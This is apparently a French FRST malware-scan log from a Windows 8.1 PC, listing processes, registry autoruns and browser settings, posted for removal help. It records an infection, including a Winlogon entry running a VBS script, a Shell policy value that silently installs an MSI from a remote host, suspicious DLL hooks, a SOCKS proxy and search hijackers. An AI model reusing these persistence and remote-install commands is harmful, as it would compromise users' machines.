cjoint

Document format: text/plain

Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 21.07.2018
Exécuté par Diane.K (administrateur) sur PC (26-07-2018 23:50:56)
Exécuté depuis C:\Users\pc1\Desktop
Profils chargés: Diane.K (Profils disponibles: Diane.K)
Platform: Windows 8.1 (Update) (X64) Langue: Français (France)
Internet Explorer Version 11 (Navigateur par défaut: "C:\Program Files (x86)\Bookness\Application\chrome.exe" "%1")
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Explorer\iedvutils.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Realtek\REALTEK Bluetooth\BTDevMgr.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
() C:\ProgramData\MobileBrServ\mbbService.exe
() C:\ProgramData\MTN Online\OnlineUpdate\ouc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(SplitCam Co.) C:\Program Files (x86)\SplitCam\SplitCamService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TorchMedia Inc.) C:\Users\pc1\AppData\Local\Torch\Update\TorchCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
() C:\Program Files (x86)\No-IP\ducservice.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Farbar) C:\Users\pc1\Desktop\farbar-recovery-scan-tool-64-bits_19-07-2018_fr_432987_64.exe

==================== Registre (Avec liste blanche) ===========================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7636696 2014-09-03] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1396592 2014-09-02] (Realtek Semiconductor)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2014-09-17] (Synaptics Incorporated)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [161728 2015-08-09] (IvoSoft)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [gplyra] => C:\Users\pc1\AppData\Roaming\gplyra\gplyra.exe [1541120 2017-02-25] () <==== ATTENTION
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [303928 2017-05-09] (Apple Inc.)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE [312376 2011-11-15] (Power Software Ltd)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe [624248 2007-05-10] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs,
HKLM-x32\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs,
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [background_fault] => C:\Users\pc1\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [50097088 2018-04-09] (Skype Technologies S.A.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [CyberGhost] => C:\Program Files\CyberGhost 6\CyberGhost.exe [1248848 2017-08-31] (CyberGhost S.A.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [ultracopier] => C:\Program Files (x86)\Ultracopier\ultracopier.exe [1200640 2016-01-02] (ultracopier.first-world.info)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Chromium] => c:\users\pc1\appdata\local\chromium\application\chrome.exe [829440 2017-02-15] (The Chromium Authors)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [GoogleChromeAutoLaunch_622FDC5463774A77AFAA15FA9986B0E8] => C:\Program Files (x86)\Fanlook\Application\chrome.exe [976216 2017-05-09] (Google Inc.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [GoogleChromeAutoLaunch_2618C502D38230C292A5E9A82228B6CF] => C:\Program Files (x86)\Standuck\Application\chrome.exe [945496 2017-02-01] (Google Inc.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1QOWYyRjNYOYU8MUI4M8I5OTNYFUUyOUJSFjI4FdEdRF== /q <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {0965f634-1840-11e6-82a4-d260c8b66546} - "F:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {48766fca-175a-11e5-8265-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {534d2c4f-19f6-11e5-8267-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {55344e8a-eb00-11e6-82c2-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {6d4ddff3-c023-11e5-828c-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {b14a5c19-f83b-11e5-829f-2c337a8bf3d0} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL F:\index.html
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {b14a72bc-f83b-11e5-829f-2c337a8bf3d0} - "H:\TL-Bootstrap.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {ea1be95e-c083-11e5-828e-d260c8b66546} - "G:\LG_PC_Programs.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2dda7bd-0d77-11e5-8261-2c337a8bf3d0} - "G:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2ddacce-0d77-11e5-8261-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2ddad47-0d77-11e5-8261-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f959f036-cdee-11e5-8297-d260c8b66546} - "F:\autorun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f959f073-cdee-11e5-8297-d260c8b66546} - "F:\autorun.exe"
HKLM\...\Providers\h9kafbc6: C:\Program Files (x86)\Juqgehuwuk Cache\local64spl.dll <==== ATTENTION
ShellExecuteHooks: Pas de nom - {7FBEA058-DE40-11E6-83E9-64006A5CFC23} - C:\Users\pc1\AppData\Roaming\Kowelystzother\Shuquty.dll [149504 2017-01-27] () <==== ATTENTION

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

ProxyServer: [S-1-5-21-813913080-1538114768-4122880109-1001] => socks=78.52.139.219:16749
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{25F21A04-496A-486E-B7EF-BCA67E497234}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{57054E79-181C-49B1-A338-5D6100939F1C}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{6E78D00F-6396-4B3D-AB08-10811C20830E}: [DhcpNameServer] 10.111.166.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131522678056251301&GUID=BC898F91-C0BF-4DE0-B05E-EA8849371D03
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131522678056257360&GUID=BC898F91-C0BF-4DE0-B05E-EA8849371D03
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1486541474&z=8960242d483ca4877096fe9gazdb0q8w0zegcz4mbo&from=archer1028&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1488877008&z=91d1f1b5712ad739685e82dgcz0b8b1bfm3m5eae9e&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488877008&z=91d1f1b5712ad739685e82dgcz0b8b1bfm3m5eae9e&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {AC3D1C0A-A641-4637-8303-B03C2AF8D303} URL = hxxp://www.amazon.fr/s/ref=azs_osd_ieafr?ie=UTF-8&tag=hp-fr2-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {2B5F0F25-5F7C-49BD-A1F2-75D620BC58A0} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H2Kzamobl7428xAU,5288a185-ab92-4e3c-adf8-aacc1557d732,
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491376049&z=5eb20a3723339b100d19ad7gezct9g9cem4qfe7z5t&from=che0812&uid=WDCXWD10JPVX-60JC3T0_WD-WXK1E849T2PS9T2PS&q={searchTerms}
SearchScopes: HKU\S-1-5-21-813913080-1538114768-4122880109-1001 -> {AC3D1C0A-A641-4637-8303-B03C2AF8D303} URL = hxxp://www.amazon.fr/s/ref=azs_osd_ieafr?ie=UTF-8&tag=hp-fr2-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll [2015-08-09] (IvoSoft)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-04] (HP Inc.)
BHO: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2015-08-09] (IvoSoft)
BHO-x32: Aide pour le lien d'Adobe PDF Reader -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-22] (Adobe Systems Incorporated)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll [2007-03-27] (Adobe Systems Incorporated.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll [2015-08-09] (IvoSoft)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-07-25] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2007-05-10] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-04] (HP Inc.)
BHO-x32: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2015-08-09] (IvoSoft)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll [2007-05-10] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\/Adobe Contribute CS3/contributeieplugin.dll [2007-03-27] (Adobe Systems Incorporated.)

FireFox:
========
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\0nvqk2dc.default\Profiles\0nvqk2dc.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\naweriweentcofise\Profiles\0nvqk2dc.default\Profiles\0nvqk2dc.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default [2018-04-27]
FF Homepage: Mozilla\Firefox\Profiles\0nvqk2dc.default -> hxxps://www.google.com/?bcutc=sp-006
FF NewTab: Mozilla\Firefox\Profiles\0nvqk2dc.default -> about:newtab
FF Extension: (Fast search) - C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\Extensions\amcontextmenu@loucypher [2017-01-27] [Legacy]
FF Extension: (Firefox Hotfix) - C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-11-26] [Legacy]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\amisites.xml [2017-02-08]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\google-avast.xml [2018-03-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\h9kafbc6.xml [2017-01-27]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\ourluckysites.xml [2017-05-31]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\smod.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Mozilla\Firefox\Profiles\0nvqk2dc.default\searchplugins\startpageing123.xml [2017-03-31]
FF ProfilePath: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default [2017-09-26] <==== ATTENTION
FF Homepage: Firefox\Firefox\Profiles\0nvqk2dc.default -> hxxp://www.searchinme.com/
FF NewTab: Firefox\Firefox\Profiles\0nvqk2dc.default -> hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h2kzamobl7428xau,5288a185-ab92-4e3c-adf8-aacc1557d732,
FF NetworkProxy: Firefox\Firefox\Profiles\0nvqk2dc.default -> autoconfig_url", "data:text/javascript,%2F*windscribe*%2Ffunction%20FindProxyForURL(url%2C%20host)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(isPlainHostName(host)%20%7C%7C%20%20shExpMatch(host%2C%20%22*.local%22)%20%7C%7C%20shExpMatch(host%2C%20%22*.int%22)%20%7C%7C%20shExpMatch(url%2C%20%22*%3A%2F%2Fapi.windscribe.com%2F*%22))%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22DIRECT%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20lanIps%20%3D%20%2F(%5E127.)%7C(%5E192.168.)%7C(%5E10.)%7C(%5E172.1%5B6-9%5D.)%7C(%5E172.2%5B0-9%5D.)%7C(%5E172.3%5B0-1%5D.)%2F%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(lanIps.test(host))%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22DIRECT%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20(url.substring(0%2C%205)%20%3D%3D%20'http%3A'%20%7C%7C%20url.substring(0%2C%206)%20%3D%3D%20'https%3A'%20%7C%7C%20url.substring(0%2C%204)%20%3D%3D%20'ftp%3A'%20%7C%7C%20url.substring(0%2C%203)%20%3D%3D%20'ws%3A')%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%22HTTPS%20ext-start.windscribe.com%22%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20'DIRECT'%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D"
FF Extension: (SimilarWeb) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-29] [Legacy] [non signé]
FF Extension: (FF Adr) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-29] [non signé]
FF Extension: (Windscribe) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\@windscribeff.xpi [2017-06-22] [Legacy]
FF Extension: (Fast search) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\amcontextmenu@loucypher [2017-02-22] [Legacy]
FF Extension: (Français Language Pack) - C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\Extensions\langpack-fr@firefox.mozilla.org.xpi [2017-05-19] [Legacy] [non signé]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\amisites.xml [2017-02-08]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\h9kafbc6.xml [2017-01-27]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\smod.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\startpageing123.xml [2017-02-21]
FF SearchPlugin: C:\Users\pc1\AppData\Roaming\Firefox\Firefox\Profiles\0nvqk2dc.default\searchplugins\startsearch.xml [2017-05-19]
